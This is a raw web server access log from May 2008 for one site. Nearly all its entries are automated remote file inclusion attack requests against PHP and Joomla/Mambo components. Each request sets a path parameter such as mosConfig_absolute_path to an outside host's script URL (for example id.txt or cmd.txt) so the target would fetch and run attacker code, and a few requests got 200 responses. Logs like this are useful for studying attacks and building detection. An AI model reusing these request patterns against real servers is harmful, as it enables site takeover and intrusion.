85.88.26.118 - - [04/May/2008:09:16:31 -0700] "GET /logs/access_080312.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:16:31 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:16:31 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:16:32 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:16:32 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:16:41 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:16:41 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
92.226.89.173 - - [04/May/2008:09:16:48 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
203.232.161.40 - - [04/May/2008:09:17:09 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/berek/papi/mami/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
92.226.89.173 - - [04/May/2008:09:17:09 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ODI3 Navigator)" "www.dmulk.com"
203.232.161.40 - - [04/May/2008:09:17:14 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/berek/papi/mami/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
203.232.161.40 - - [04/May/2008:09:17:20 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/berek/papi/mami/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:17:29 -0700] "GET /logs/access_080321.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.226.89.173 - - [04/May/2008:09:17:31 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ODI3 Navigator)" "www.dmulk.com"
78.90.30.31 - - [04/May/2008:09:17:35 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.90.30.31 - - [04/May/2008:09:17:36 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:17:39 -0700] "GET /logs/access_080321.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.226.89.173 - - [04/May/2008:09:18:14 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:18:14 -0700] "GET /logs/access_080215.log//akocomments.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:18:14 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:18:14 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:18:30 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:18:31 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.93.123 - - [04/May/2008:09:18:33 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.ipdf.kr/bbs//skin/do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
80.249.117.66 - - [04/May/2008:09:18:35 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.226.89.173 - - [04/May/2008:09:18:35 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.dmulk.com"
80.249.117.66 - - [04/May/2008:09:18:36 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.93.123 - - [04/May/2008:09:18:36 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.ipdf.kr/bbs//skin/do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:18:50 -0700] "GET /logs/access_080302.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:09:18:56 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.249.117.66 - - [04/May/2008:09:18:56 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.117.66 - - [04/May/2008:09:18:56 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:09:18:56 -0700] "GET //Neos_Chronos/header.php?base_folder=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.226.89.173 - - [04/May/2008:09:18:58 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.5) Gecko/20031021" "www.dmulk.com"
80.249.117.66 - - [04/May/2008:09:19:08 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.117.66 - - [04/May/2008:09:19:08 -0700] "GET /convert/mvcw.php?vwar_root=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.226.89.173 - - [04/May/2008:09:19:19 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 compatible ZyBorg/1.0 (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)" "www.dmulk.com"
92.226.89.173 - - [04/May/2008:09:19:42 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Googlebot/2.1 (http://www.googlebot.com/bot.html)" "www.dmulk.com"
83.103.23.40 - - [04/May/2008:09:19:51 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.terravitagolfclub.com/weather/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.226.89.173 - - [04/May/2008:09:20:04 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mediapartners-Google/2.1" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:20:08 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.203.209.2 - - [04/May/2008:09:20:15 -0700] "GET /logs/access_071220.log/!scanhttp://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.209.2 - - [04/May/2008:09:20:15 -0700] "GET /!scanhttp://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.209.2 - - [04/May/2008:09:20:15 -0700] "GET /logs/!scanhttp://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.226.89.173 - - [04/May/2008:09:20:27 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5" "www.dmulk.com"
203.232.161.40 - - [04/May/2008:09:20:50 -0700] "GET /logs/access_080126.log//components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/berek/papi/mami/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
213.203.209.2 - - [04/May/2008:09:20:51 -0700] "GET /logs/access_080113.log/!scanhttp://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.52.151.111 - - [04/May/2008:09:21:15 -0700] "GET /logs/access_080215.log/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.tourville-en-ligne.net/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.67.192 - - [04/May/2008:09:21:27 -0700] "GET /logs//includes/mailaccess/errors.php?error=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [04/May/2008:09:21:28 -0700] "GET //includes/mailaccess/errors.php?error=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:21:29 -0700] "GET /logs/access_080219.log/extras/ext_cats.php?dir_path=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/priv.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:21:29 -0700] "GET /extras/ext_cats.php?dir_path=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/priv.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:21:29 -0700] "GET /logs/extras/ext_cats.php?dir_path=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/priv.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:21:32 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:21:33 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:09:22:08 -0700] "GET /logs/access_080215.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:09:22:09 -0700] "GET /logs/access_080215.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.16.220 - - [04/May/2008:09:22:16 -0700] "GET /funny/Mencanmultitask.asx HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:22:17 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:22:28 -0700] "GET /logs/access_080228.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:22:28 -0700] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:22:28 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:22:29 -0700] "GET /logs/access_080211.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:22:45 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.48.10.14 - - [04/May/2008:09:23:29 -0700] "GET /logs/access_080107.log/inc/shows.inc.php?cutepath=http://www.19thgreen-bb.com/cache/%20/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:23:34 -0700] "GET /logs/access_071209.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:23:34 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:23:35 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:23:35 -0700] "GET /logs/access_071209.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:23:36 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:23:36 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:23:36 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:23:37 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:23:38 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:23:38 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:23:38 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:24:01 -0700] "GET /logs/access_080312.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:24:01 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:24:01 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
78.90.30.31 - - [04/May/2008:09:24:12 -0700] "GET /logs/access_080215.log/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:24:38 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:24:38 -0700] "GET /SQuery/lib/gore.php?libpath=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.197.231.29 - - [04/May/2008:09:24:54 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://galee.freetzi.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.93.123 - - [04/May/2008:09:25:00 -0700] "GET //metabase/metabase_interface.php?commonpath=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.93.123 - - [04/May/2008:09:25:01 -0700] "GET //metabase/metabase_interface.php?commonpath=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:25:03 -0700] "GET /logs/access_080311.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:25:03 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:25:03 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.3.183 - - [04/May/2008:09:25:12 -0700] "GET /logs/access_080311.log//faqsupport/samplefaqsupport.php?path[docroot]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.3.183 - - [04/May/2008:09:25:12 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.3.183 - - [04/May/2008:09:25:13 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:25:41 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:09:25:58 -0700] "GET /logs/access_080313.log/////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:09:26:01 -0700] "GET /////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:09:26:02 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 200 45991 "-" "libwww-perl/5.805" "www.dmulk.com"
83.133.127.44 - - [04/May/2008:09:26:04 -0700] "GET /logs/send_reminders.php?includedir=http://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.133.127.44 - - [04/May/2008:09:26:04 -0700] "GET /send_reminders.php?includedir=http://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:26:14 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 compatible ZyBorg/1.0 (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)" "www.dmulk.com"
213.186.117.208 - - [04/May/2008:09:26:18 -0700] "GET /logs/access_080315.log//metabase/metabase_interface.php?commonpath=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.186.117.208 - - [04/May/2008:09:26:18 -0700] "GET //metabase/metabase_interface.php?commonpath=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.186.117.208 - - [04/May/2008:09:26:19 -0700] "GET /logs//metabase/metabase_interface.php?commonpath=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:09:26:32 -0700] "GET /logs/access_080312.log/////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:26:42 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:26:44 -0700] "GET //index.php?fn=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/3.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:27:05 -0700] "GET /logs/access_080228.log/modules/vwar/admin/admin.php?vwar_root=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:27:06 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:27:06 -0700] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:27:07 -0700] "GET /logs/access_071229.log/modules/vwar/admin/admin.php?vwar_root=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.98.184.24 - - [04/May/2008:09:27:08 -0700] "GET //metabase/metabase_interface.php?commonpath=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:27:10 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.5) Gecko/20031021" "www.dmulk.com"
208.101.26.99 - - [04/May/2008:09:27:20 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://geocities.com/refusedlink/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.58.186 - - [04/May/2008:09:27:24 -0700] "GET /logs/access.log HTTP/1.0" 200 73788 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:27:39 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
85.17.3.183 - - [04/May/2008:09:27:51 -0700] "GET /logs/access_080218.log//faqsupport/samplefaqsupport.php?path[docroot]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.90.121 - - [04/May/2008:09:28:06 -0700] "GET //metabase/metabase_interface.php?commonpath=http://www.barasthemeteam.de//templates/dropdown?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:28:07 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:28:36 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.6" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:29:03 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8a5) Gecko/20041122" "www.dmulk.com"
78.90.30.31 - - [04/May/2008:09:29:17 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
